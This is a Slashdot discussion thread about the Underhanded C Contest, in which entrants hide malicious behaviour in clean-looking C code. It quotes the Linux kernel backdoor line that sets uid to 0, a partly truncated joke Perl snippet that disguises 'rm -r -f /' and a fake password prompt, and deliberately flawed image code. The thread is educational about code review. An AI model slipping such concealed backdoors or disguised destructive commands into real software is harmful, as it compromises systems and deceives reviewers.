The First Annual Underhanded C Contest
Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."
Re:What are the legal ramifications of this? (Score:3, Informative)
RTFA, please.
The challenge for the first UCC is to write a simple program that performs some basic image-processing operation, for example smoothing or resampling, but manages to conceal a unique imperceptible fingerprint in each image it opens.
The fingerprint should be different for every execution of the program. It doesn't have to have any particular meaning, but useful tracking information is worth extra points (tho getting caught is worth fewer points.) The print should be extractable from the output image by another program. Realistically, the detector will not have access to the original image for comparison purposes.
I seriously doubt that anyone could get arrested for writing something like this, dubious legal state or not.
Re: This year's challenge (Score:5, Informative)
Why, yes! http://sourceforge.net/projects/steghide/ [sourceforge.net]
Re:Indeed. This could be a field day for Java and (Score:3, Informative)
Re:Seems a bit like those hacking contests (Score:5, Informative)
I mean I could do something like this:
# When do you want it done?
$today="sudo";
$yesterday="su -c";
# Define our globals
$superman="ls";
$wonderwoman="rm"
$bat
$aquaman="mv";
#define some important flags
$blows="-r";
$maims="-p";
$chunks="-f";
#define some targets
$your_mom="/";
$your_dad="/usr";
$your
$your_teacher="/bin";
$hell="/dev/n
$heaven="/dev/random";
$skyhigh="nfs://mys
#....later, back at Superfriends Headquarters
`$batman $blows $your_sister $skyhigh`;
`$wonderwoman $blows $chunks $on $your_sister`;
`$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
#Would you like to see the rest of the story?
#print "Would you like to hear more? Please type your password to continue!";
The superfriends save the day again.
Re:Attack the Compiler (Score:2, Informative)
Re:Indeed. This could be a field day for Java and (Score:4, Informative)
Please check out the contest page: the "evil" behavior is not something Java would prevent you from doing. We're not talking about crashing a computer or gaining root access, but performing a data processing task incorrectly. It's entirely problem state.
That being said, I chose C because it does permit more tricks along the lines of stack smashing and type mismatches. The winners of the obfuscated V contest used techniques like this to conceal their evil behavior, so I feel this would give people more freedom to get creative.
Finally, this is not meant to slam C, or open source, or any such like. I can't imagine how anyone can look at this contest and see it as an argument for less openness.
Xcott
Re:This will work (Score:1, Informative)
2. You don't mod people down over Godwin's Law. You declare the argument over, and the person who tried to use nazis or Hitler to vilify their opponent is the loser. There is no "-1, Godwin" mod category, nor should there be.
3. You only mod jokes up as "Funny" or "Insightful" if they are, in fact, funny or insightful. Saying Free Beer doesn't lead to greater liberties because Hitler once gave some people free beer fails to either debunk the original point (which can still be true in other cases), and also fails to make anybody laugh.
So no mod points should be used on his post, so people can save them to mod down both your post and mine as "Offtopic."
Re:Story is just plain bad (Score:3, Informative)
Have you seen Technocrat.net [technocrat.net]? Looks to be just starting, but I'm already impressed: slashdot ran an article on a nanotech textiles protest - technocrat ran one on a group of scientists demonstrating a refined iteration of a carbon nanotube CPU. Comments are on-topic too, touch wood.
(Or there's always ars [arstechnica.com] for CS stuff, but they're hardly a
Re:Why? (Score:4, Informative)
Is Google down? Okay, I updated the faq to tell you who we are.
Also, we never said anything about hackers. Nowhere have we associated hacking with malicious behavior. And I sincerely hope this will be a learning experience for all involved. I, in particular, will probably learn a thing or two about running next year's contest.
Xcott
Re:Why? (Score:3, Informative)
Something like:
if (blah || blah || uid=0) {
blah;
}
Linux Kernel Backdoor Attempt (Score:5, Informative)
The attempt was trying to insert
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).
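The effect of that line in a user-space model, as an added example that is not part of the original comment or of any kernel source: `struct demo_task`, the `DEMO_*` flag values and the function names are constructed stand-ins for the kernel names quoted above.

```c
#include <stdio.h>

/* Constructed stand-ins for the flag names quoted in the comment above. */
#define DEMO_WCLONE 0x80000000u
#define DEMO_WALL   0x40000000u

struct demo_task { unsigned int uid; };

/* Shape of the quoted line: "=" stores 0, and the value of the assignment (0)
 * makes the whole condition false, so the branch body never runs. */
static int check_backdoored(struct demo_task *current, unsigned int options)
{
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid = 0))
        return -1;              /* unreachable through this condition */
    return 0;
}

/* What a reviewer assumes the line says: a comparison with no side effect. */
static int check_intended(struct demo_task *current, unsigned int options)
{
    if ((options == (DEMO_WCLONE | DEMO_WALL)) && (current->uid == 0))
        return -1;
    return 0;
}

/* Run one check on a fresh task with uid 1000 and report the uid afterwards. */
static unsigned int uid_after(int (*check)(struct demo_task *, unsigned int),
                              unsigned int options)
{
    struct demo_task t = { 1000u };
    (void)check(&t, options);
    return t.uid;
}

int main(void)
{
    unsigned int magic = DEMO_WCLONE | DEMO_WALL;
    printf("backdoored, ordinary flags: uid=%u\n", uid_after(check_backdoored, DEMO_WALL));
    printf("backdoored, both flags:     uid=%u\n", uid_after(check_backdoored, magic));
    printf("intended,   both flags:     uid=%u\n", uid_after(check_intended, magic));
    return 0;
}
```

Because the doubled parentheses silence the compiler's assignment-in-condition warning, a review or lint rule that flags every `=` inside an `if` condition, however it is parenthesised, is the check that catches this shape.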
C is an awful language (Score:2, Informative)
Service Pack fixes it, but it's documented (Score:5, Informative)
Re:An example from years ago (Score:4, Informative)
Re:Subtlety (Score:3, Informative)
I've tried their Rare Vos, Hennepin, and self-named Ommegang beer: my favorite is the Rare Vos but I like them all.
Re:how's this? (Score:3, Informative)
What you really want is something more subtle. For example, here's an easy one using rounding errors in the core of a smoothing algorithm. Assumes a picture of width x height of type "RGB" (assumed to be a typedef'ed struct containing bytes r, g, and b) in a two-dimensional array called "picture" (and an equivalent one called "dest_picture").
for (int x=0; x<width; x++)
{
    const int next_x=(x+1==width ? 0 : x+1);
    const int prev_x=(x-1==-1 ? width-1 : x-1);
    for (int y=0; y<height; y++)
    {
        const int next_y=(y+1==height ? 0 : y+1);
        const int prev_y=(y-1==-1 ? height-1 : y-1);
        const RGB point1 = picture[prev_x][prev_y];
        const char point1_r = point1.r / 9;
        const char point1_g = point1.g / 9;
        const char point1_b = point1.b / 9;
        const RGB point2 = picture[x][prev_y];
        const char point2_r = point2.r / 9;
        const char point2_g = point2.g / 9;
        const char point2_b = point2.b / 9;
        /* point3 .. point9: the remaining seven neighbours, same pattern (not shown in the post) */
        const char dest_r = point1_r + point2_r + point3_r + point4_r + point5_r + point6_r + point7_r + point8_r + point9_r;
        const char dest_g = point1_g + point2_g + point3_g + point4_g + point5_g + point6_g + point7_g + point8_g + point9_g;
        const char dest_b = point1_b + point2_b + point3_b + point4_b + point5_b + point6_b + point7_b + point8_b + point9_b;
        dest_picture[x][y].r=dest_r;
        dest_picture[x][y].g=dest_g;
        dest_picture[x][y].b=dest_b;
    }
}
In case you didn't catch what it does, by dividing by nine before accumulating instead of afterwards, we're losing more color resolution. You'll never see values 253, 254, or 255, for example, in r, g, or b. There will also be a sawtooth pattern in what were initially smooth gradients on a per-channel basis (less noticeable when the image is viewed as a whole). It's not perfect, but it is a start. The possibilities really increase when doing things that add noise to an image; skewing a randomization function is trivially easy.
If you want to be really devious, though, you need to mess with program internals. Overflow a string to mess with your function's frame return parameter, for example. You could also do things like deliberately cause signals to be thrown that you catch. There's a lot of possibilities.
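The quantisation described in the comment above can be measured directly. The following is an added example, not the poster's code: it works on a single 8-bit channel of a constructed 8x8 image, and the names `box_blur`, `blur_flat` and `distinct_levels` are hypothetical. It compares dividing each neighbour by nine before summing with summing first and dividing once.

```c
#include <stdio.h>

enum { W = 8, H = 8 };  /* constructed image size for the demo */

/* 3x3 box blur with wrap-around edges on one 8-bit channel.
 * divide_first=1 is the post's order (each neighbour / 9, then sum);
 * divide_first=0 sums the nine neighbours and divides once. */
static void box_blur(unsigned char src[W][H], unsigned char dst[W][H], int divide_first)
{
    for (int x = 0; x < W; x++) {
        for (int y = 0; y < H; y++) {
            unsigned int acc = 0;
            for (int dx = -1; dx <= 1; dx++)
                for (int dy = -1; dy <= 1; dy++) {
                    unsigned int v = src[(x + dx + W) % W][(y + dy + H) % H];
                    acc += divide_first ? v / 9 : v;
                }
            dst[x][y] = (unsigned char)(divide_first ? acc : acc / 9);
        }
    }
}

/* Blur a flat image of the given level and return the output level. */
static unsigned int blur_flat(unsigned int level, int divide_first)
{
    unsigned char src[W][H], dst[W][H];
    for (int x = 0; x < W; x++)
        for (int y = 0; y < H; y++)
            src[x][y] = (unsigned char)level;
    box_blur(src, dst, divide_first);
    return dst[W / 2][H / 2];
}

/* Count the distinct output levels that flat inputs 0..255 produce. */
static int distinct_levels(int divide_first)
{
    int seen[256] = {0}, n = 0;
    for (unsigned int level = 0; level < 256; level++) {
        unsigned int out = blur_flat(level, divide_first);
        if (!seen[out]) { seen[out] = 1; n++; }
    }
    return n;
}

int main(void)
{
    printf("flat 255: %u divide-first, %u divide-last\n", blur_flat(255, 1), blur_flat(255, 0));
    printf("levels:   %d divide-first, %d divide-last\n", distinct_levels(1), distinct_levels(0));
    return 0;
}
```

A reviewer or detector can look for the same signature from the outside: a per-channel ceiling of 252 and a comb-shaped histogram on flat regions are not what a correct box blur produces.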
Vectors (Score:3, Informative)
A way to automatically find this would be to use an execution tracer that would alert you when the program's point of execution "left" its source code or allowed system APIs.
Re:I'll take the bait (Score:3, Informative)
You are correct. This is from ISO/IEC 9899:1999(E):
(emphasis added)
Re:You're just not used to it. (Score:1, Informative)
Are you aware that the Linux kernel contains not just one, but two fully-functional tracing garbage collectors? There's one in JFS2 and another in the routing table/xform code.
Funny how people always get hung up about GC, when really it's all around them and they never even knew, because the flaws they thought it had don't exist.